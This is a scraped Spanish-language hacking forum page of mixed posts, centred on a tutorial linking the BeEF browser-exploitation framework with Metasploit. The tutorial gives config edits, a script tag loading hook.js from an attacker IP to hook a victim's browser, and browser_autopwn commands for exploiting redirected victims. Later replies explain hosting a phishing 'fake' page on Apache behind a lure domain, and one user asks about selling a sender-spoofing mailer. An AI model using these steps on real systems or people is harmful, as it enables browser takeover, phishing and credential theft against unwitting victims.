Bienvenido a la comunidad!!

Espero que estés agusto y te sientas como en casa!

Un saludo.

A ver, está claro que el hardware también se desgasta y es lógico que no rinda tanto... pero influye mucho el sistema operativo, siempre hay una gran cantidad de archivos sin utilidad que se quedan en el disco (suele ocurrir con Windows xDD), formatea de vez en cuando y cómprate un disco duro de alta velocidad, ten en cuenta que la refrigeración también es importante al igual que mantenerlo limpio.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Los xats son vulnerables y mínimamente recomendados, el IRC es más cómodo, por cierto, yo propongo que se deberían de crear plataformas para programación, así como code academy por ejemplo, para una experiencia más "real" en cuanto a programación, al igual se podría aplicar al hacking, phreaking, wireless, etc etc, sé que por eso están los wargames, pero una plataforma sería más "cómoda y realista", además de que acoplaría al usuario a un uso más cotidiano del lenguaje, saludos.

Arthusu: Odio SAO ajajajajaja

LOL xD!

Sobre lo que comentas me parece una buena idea como hace tiempo vi que unos users estaban creando una forma de aprender pentest (mas bien me la mostro un amigo que esta registrado aqui xD ), donde simulaban una aplicacion y a la ves enseñaban, es decir, por ejemplo: ataques xss, te explicaban por que ocurria y como inyectar luego tu inyectabas xss en un simulador y baam salia el xss y seguia el siguiente nivel y asi te seguian explicando y aprendiendo al mismo tiempo que practicabas con el simulador, es como eso de programacion de codecademy, pero enfocado al pentest... podria ser cualquier cosa, bueno solo es otra sugerencia mas xD
Salu2

PD: F0M3T nisiquiera lo has visto weon xD 

Buena sugerencia arthusu, el problema es que con xss no habría problema pero imaginate sqli y rfi habrían muchos newbies lanzando apps e intentando dañar el server... aunque si se hace bien y con un entorno controlado... lo veo una idea perfecta!

Bienvenido a la Comunidad!

Espero que te sientas agusto y que aprendas mucho, de tal manera, espero también aprender contigo.

Un saludo y cualquier cosa no dudes en pedirla.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Podrás tener el S.O más seguro desarrollado hasta el momento, pero mucho mas importante es la persona que lo administra.
"No existe parche para la estupidez humana"
Saludos

Estoy con Code, puede ser el sistema más seguro del mundo y que un administrador inútil lo deje expuesto...

Aunque está claro, que para mi es Linux

Un saludo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
el tema es qe son claves y estan "encriptadas", pero nose en qe :/ ...
estoy 100% seguro qe son claves, pero mas alla de eso nose mas 

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

No, pero echa un vistazo aquí xD

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo.

Me apunto, aunque no tengo demasiada idea en este tema :S

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Linux Mint 15 MATE

Pff pues ni idea :S yo no pude instalarlo así y tuve que hacer unas cosas con ocultos que vi en un video si quieres te lo paso :S

Que versión de ubuntu usas?

Has probado siendo superusuario?

Un saludo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Esto vale para los hacktivistas de la careta de anonymous y el loic, como te ataquen con una botnet, y de javascript con 100.000 proxies, no lo paras ni para atras, a no ser q limites tidio el trafico a tu web. Saludos

Dudo que alguien con una botnet así gaste su tiempo atacando webs pequeñas, además mejor eso que nada ¬¬'

Un saludo.

Bienvenido a la comunidad m5f3r0

Espero que te sientas cómodo en la comunidad, espero ver pronto esos aportes

Un saludo!

Bueno, hoy os traigo un tutorial, es bastante básico pero lo busqué para ver si estaba y no lo encontré asique os lo hago para vosotros

Vamos a empezar por descargar el beef --> You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login o You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Para que funcione, necesitamos tener instalado las siguientes depencias: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (os lo detallaría más, pero no se que s.o usáis cada uno xD)


Una vez todo instalado, vamos a integrarlo con metasploit, para ello vamos al directorio donde tenemos los archivos del beef.



Localizamos el fichero config.yaml y lo abrimos, vamos a la línea 113 o bien buscamos la palabra "metasploit"

Y lo activamos de esta manera:

metasploit:
enable: true

Grabamos el archivo y nos dirigimos de nuevo al directorio del beef después a extensions/metasploit y buscamos un fichero que se llama config.yaml

Modificamos las líneas introduciendo la IP de nuestro ordenador. Para evitar conflictos por si nuestra IP cambia, pondremos 127.0.0.1

host: "127.0.0.1"

Una vez configurados los dos archivos, ejecutamos metasploit:



Una vez se haya cargando, introducimos lo siguiente: (Teneis que ponerlo respecto a como tengais el config.yaml de /extensions/metasploit)

load msgrpc SeverHost=127.0.0.1 Pass=abc123

Una vez hayamos hecho esto, vamos a ejecutar beef, para ello accedemos al directorio y lo ejecutamos de esta manera.

./beef -x -v

Esperamos a que cargue, una vez finalizado, podemos ver la dirección de nuestro panel:



Accedemos a esa dirección y nos logueamos:

Usuario: beef
Contraseña: beef



Ahora vamos a infectar a una máquina, en mi caso seré yo mismo xD

Para infectar a una máquina hay que conseguir que cargue el fichero hook.js, para ello en una página web habría que introducir lo siguiente:

<script src="http://192.168.1.34:3000/hook.js"></script>

Una vez tengamos a la máquina en el panel podemos iniciar el ataque.




Como vemos, en el apartado de metasploit nos salen los exploits, ya que lo hemos implementado anteriormente.


Otro método de ataque es cargar el autopwn de metasploit y luego redirigir a la víctima a la dirección del autopwn:

Para cargarlo, vamos a la consola de metasploit e introducimos estos parámetros:

use auxiliary/server/browser_autopwn (Usar el modulo browser_autopwn)
set lhost 192.168.1.34 (IP del Atacante)
set srvhost 192.168.1.34 (IP del Atacante)
set uripath / (Path del link a enviar)
set srvport 8080 (Puerto)
exploit



Y esperamos a que termine de cargar... (en un ataque se recomienda tener ya el autopwn cargado ya que tarda).



Una vez cargando, vamos a redirigir a la víctima a la página que nos genera el autopwn:






Posibles errores al ejecutar beef.



Solución:

-Actualizar Ruby o bien:





Visitar: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login si teneis ese error, para instalar rvm


Y eso es todo, ya tendríamos el beef integrado con metasploit y perfectamente funcionando

Un saludo.

Pon bien la imagen por favor

Un saludo.

Gracias por el aporte , luego la testeo

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
¡Muchas gracias por su asesoramiento! Bueno veo que no me estaría guiando por buen camino, pero, ¿en teoría si podría vender un mailer? Un producto que envía un mail a través de un script en PHP (con la capacidad de modificar el FROM, ej: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) no sería ilegal en cierto modo. Si el cliente le da un uso fraudulento ya es problema suyo.

¿Estoy en lo cierto?

Un saludo, gracias por leer.

A ver, las restricciones de esos scripts las introduce el programador, y si permite suplantar la identidad de otra persona es ilegal.

Es igual de culpable el que lo utiliza como el que lo programa.

Un saludo.

A mi también me pasa cuando estoy en Windows, y solo se dos soluciones, cerrar skype y correr apache o cambiar el puerto de escucha de skype.

Pero ya está solucionado asique perfecto

La sección de cuarentena está para lo que dice Hu3c0, si algún usuario postea algún archivo que puede estar infectado se manda a la sección de cuarentena para analizarlo correctamente.

En cuanto a la sección de ayuda, los enlaces funcionan correctamente, ya que te llevan a la ayuda de smf.

Un saludo, alguna duda más?

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Creo haberte  comprendido y hace mucho tiempo que no lo he hecho, pero era activando el apache en el puerto 80 y poner tu fake   en donde esta el index.html sustituyendolo por tu fake entonces todo aquel que ponga
en el navegador http://tu ip wan:80 accedera a tu fake, tambien creo que creandote un dominio en .tk y redirigiendo a tu ip lo puedes hacer.
Asi si creas un dominio en .tk por ejemplo hackeando facebook y You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login todo el que clickee en  este dominio se redireccionara a tu ip puerto 80 y lograras lo que tu quieres
Espero haberte ayudado

A ver, tomando el post: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Haz todos los pasos una vez lo hayas hecho, compruebas que funciona accediendo por ejemplo desde una virtual a 192.168.1.37 (o la IP que tengas), si funciona es tan sencillo como redirigir las conexiones que vengan por el puerto 80 de tu IP pública a esa privada

Un saludo.